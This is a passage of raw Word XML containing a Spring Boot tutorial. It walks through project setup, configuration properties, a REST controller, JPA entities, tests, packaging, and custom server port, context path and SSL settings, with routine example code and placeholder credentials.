        <w:t xml:space="preserve"> (e.g., demo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C307861" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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lastRenderedPageBreak/>
        <w:t>Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., demo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A870CD7" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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escription:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (optional, e.g., Spring Boot Demo Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A04585D" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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ackage name:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BED3D5" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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ackaging:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jar (or WAR, depending on the requirements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD1695E" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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Java version:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 11 or 17 (based on your environment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC436ED" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107"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ependencies:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add the necessary dependencies based on your application (e.g., Spring Web, Spring Data JPA, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487C24FF"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After filling in the details, click on </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Generate</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which will provide a zip file. Extract this zip file and open it in your preferred IDE (e.g., IntelliJ IDEA, Eclipse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA43110" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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Configure application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB1843"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t up configuration properties for your Spring Boot application, such as database connection details, server port, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DEC04C"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 of application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983E41F"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port=8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D3622A"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rl=jdbc:mysql://localhost:3306/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F69BB20"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sername=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C9A9C"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password=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E04204B"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jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F57E457" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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Create the Main Application Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DFCAA0"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entry point of your Spring Boot application will be a class annotated with @SpringBootApplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D410E"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p>
    <w:p w14:paraId="7F658342"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ackage com.example.demo;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74697E9F" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2B9F83"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boot.SpringApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9320E8"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boot.autoconfigure.SpringBootApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39624697" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3ACE53"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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09F3DD"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DemoApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD111E"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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E68FB4"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pringApplication.run(DemoApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3023C422"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67281AB9"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08962B43"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SpringBootApplication annotation is a combination of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04066D14"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ation – Marks the class as a source of bean definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593538A"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ableAutoConfiguration – Enables Spring Boot's auto-configuration mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF87C3E"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mponentScan – Scans for Spring components in the specified package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC34FAE" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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4. Create Controller Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D4BB7A"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o create REST endpoints, use @RestController or @Controller for serving HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928F523"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 of a simple REST controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435113EF"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ackage com.example.demo.controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187697F6" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B06D92"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web.bind.annotation.GetMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43682C2B"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web.bind.annotation.RestController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7334F5" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C34B7B"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03339B88"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HelloController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE26EF8" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C813A3"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tMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A62236"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ring hello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B7531"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Hello, Spring Boot!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4BB125"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71D791D5"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76029DD3" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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5. Add Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D94D2"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f you want to add more functionality (e.g., database integration, security, etc.), you can add dependencies to pom.xml (for Maven) or build.gradle (for Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF32F27"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 for Maven (pom.xml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F64D677"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ies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A847145"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 xml:space="preserve">    &lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FA15F7"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4629A3E2"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spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4680F84E"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC2B50E"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A8C96E"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4457A7"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spring-boot-starter-data-jpa&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE38194"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EED16C"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E50117"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com.h2database&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24679591"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h2&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E196B8"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scope&gt;runtime&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5FEFC7"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747E8473"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ies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC23D8" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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6. Build and Run the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE7D6E1"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From your IDE:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Right-click on the DemoApplication class and choose </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2B6588"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From the command line (using Maven):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE2EC8C"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mvn spring-boot:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E997E0B"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ing JAR file:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you’ve built your project into a JAR file (e.g., using mvn clean install), you can run it with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218534E7"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java -jar target/demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B51A5" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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7. Access the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A87E49B"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By default, the application will be running on http://localhost:8080. If you have a controller set up with a /hello endpoint, you can access it by visiting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A59FAF4"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http://localhost:8080/hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD4B2A" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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8. Configure Database (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28397302"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f you're using a database, you may need to configure the DataSource, JpaRepository, or JdbcTemplate for data persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFDEB2B"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p>
    <w:p w14:paraId="2E33A97D"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tity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF9E439"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B520F2"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BDAD44"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neratedValue(strategy = GenerationType.AUTO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD033C"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3962069D"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A48B82"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String role;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43889EDE"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B437DAB" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1738F851"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9B042D"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interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC40DC"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00512459" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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9. Testing the Application (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EC1784"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rite unit tests using @SpringBootTest, @WebMvcTest, or @DataJpaTest to ensure your application is working as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534EEABC"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 of unit test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159016FA"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BootTest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE1EC7"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lass DemoApplicationTests {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FADB5" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E37C46F"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est</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C779B56"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void contextLoads() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038EF0E3"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1DBBE240"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BE3640D" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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0. Create an Executable JAR or WAR (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D822667"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f you want to deploy the application, you can build an executable JAR or WAR file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35083BE6"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To build a JAR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EEB169"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mvn clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B18CE3B"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After this, you will have a demo-0.0.1-SNAPSHOT.jar file in the target/ directory, which you can run as an executable JAR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AC730B" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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ummary of Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC63D06"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t up the project using Spring Initializr.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431FC25B"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e application.properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346FF939"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reate a @SpringBootApplication main class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B8C338"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reate REST controllers or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39260812"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dd necessary dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03107462"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Build and run the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294D7EE9"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Optional) Configure database and repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0A8A0A"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est the application (using unit tests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E6080"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Optional) Package the app into a JAR or WAR for deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A8D130" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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Following these steps will allow you to quickly set up a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F40A76" w14:textId="1E62571A"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FEC7C1E">
          <v:rect id="_x0000_i2668" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9E7E1" w14:textId="4E780834" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="635" w:name="_Toc196308115"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to configure a custom server in a Spring boot application</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="635"/>
    </w:p>
    <w:p w14:paraId="736F83BA" w14:textId="0BEF03FA" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="00754045"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o configure a custom server in a Spring Boot application, you can adjust the application.properties or application.yml file or programmatically configure the embedded server (like Tomcat, Jetty, or Undertow). Here’s how you can do it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181D658B" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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Configure Server Port and Host (application.properties or application.yml)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACD396C"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configure the port and host of the embedded server in the application.properties or application.yml file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E20B95A" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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Using application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787398B8"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port=8081  # Specify the custom port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B6C1C2"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address=127.0.0.1  # Set the custom IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F33ED24"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servlet.context-path=/myapp  # Define the context path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D6ABA" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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Using application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01942396"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B25E5F2"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ort: 8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F32E15"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ddress: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773BD7AB"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ervlet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCDC331"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context-path: /myapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C6033E" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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Customizing Server Configuration Programmatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77568F"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f you need more control over the server (e.g., adding SSL, customizing connection settings), you can configure the server programmatically by implementing WebServerFactoryCustomizer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3940A183" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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Example: Customizing the Embedded Tomcat Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F80F847"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boot.web.embedded.tomcat.TomcatServletWebServerFactory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C1A5E5"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boot.web.servlet.server.ConfigurableServletWebServerFactory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D05FD76"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boot.web.servlet.server.ServletWebServerFactory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D96557"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context.annotation.Bean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2411B3C4"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context.annotation.Configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562A351A" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="00754045" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C440A8D"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49559079"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CustomServerConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72945635" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="00754045" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBC30CE"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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A92AED"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ervletWebServerFactory servletContainer() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E082A4"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omcatServletWebServerFactory factory = new TomcatServletWebServerFactory();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D009E6D"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factory.setPort(8082); // Set a custom port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA950F"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factory.setContextPath("/mycustomapp"); // Set a custom context path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C55C02"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factory.addConnectorCustomizers(connector -&gt; connector.setAttribute("maxThreads", 200)); // Customize thread pool size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67806F"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factory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B6F5A5"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65FA942E"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9138F5D"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approach allows for more advanced server configurations like customizing the server thread pool, adding SSL support, or integrating with other server features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6FB6C7" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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lastRenderedPageBreak/>
        <w:t>3. Configure SSL for the Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC3E1E1"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enable SSL (HTTPS) by configuring it in the application.properties or application.yml file or programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBD8307" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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Using application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70587AFB"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port=8443  # Custom port for HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D72EE6A"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ssl.key-store=classpath:keystore.jks  # Path to the keystore file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D311C79"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ssl.key-store-password=password  # Password for the keystore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301DF7C5"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ssl.key-store-type=JKS  # Type of keystore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B701AF"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ssl.key-alias=myalias  # Alias of the key to use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC84421" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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Using application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EA909C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA9CCA"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ort: 8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1DF5C9"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sl:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6AD1FF"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key-store: classpath:keystore.jks</w:t>
      </w:r>
